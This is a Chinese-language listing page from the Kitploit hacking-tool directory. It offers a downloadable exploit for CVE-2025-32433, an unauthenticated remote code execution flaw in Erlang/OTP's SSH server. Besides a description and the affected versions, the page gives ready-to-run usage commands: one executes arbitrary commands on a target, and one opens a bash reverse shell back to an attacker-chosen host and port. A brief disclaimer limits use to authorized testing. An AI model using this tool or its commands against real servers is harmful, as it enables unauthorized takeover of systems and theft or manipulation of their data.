Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32433 — CVE-2025-32433 Erlang/OTP SSH RCE 漏洞利用 SSH远程代码执行漏洞EXP | Kitploit
工具/GitHubGitHub/0x7556/cve-2025-32433
漏洞分析漏洞利用渗透测试命令与控制红队远程访问工具
GitHub0x7556/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Erlang/OTP SSH RCE 漏洞利用 SSH远程代码执行漏洞EXP

查看仓库
313个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32433 Erlang/OTP SSH RCE 利用工具

描述

在 Erlang/OTP SSH 服务器中发现了一个严重漏洞,可能允许攻击者执行未经身份验证的远程代码执行(RCE)。通过利用 SSH 协议消息处理中的缺陷,恶意攻击者可以在没有有效凭据的情况下获得对受影响系统的未授权访问并执行任意命令。这可能导致上述主机受损,从而允许第三方未经授权访问和操纵敏感数据,或发起拒绝服务攻击。

受影响版本

root@kitploit:~
OTP-27.3.2 及更早版本
OTP-26.2.5.10 及更早版本
OTP-25.3.2.19 及更早版本

功能

  • 漏洞利用执行:执行任意命令。
  • 反弹 Shell:启动基于 bash 的反弹 Shell。

使用方法

执行命令:

root@kitploit:~
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'

启动反弹 Shell:

root@kitploit:~
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

CVE-2025-32433

参考

GitHub 安全公告

NVD CVE-2025-32433

平台安全

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

免责声明

  • 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。
下载工具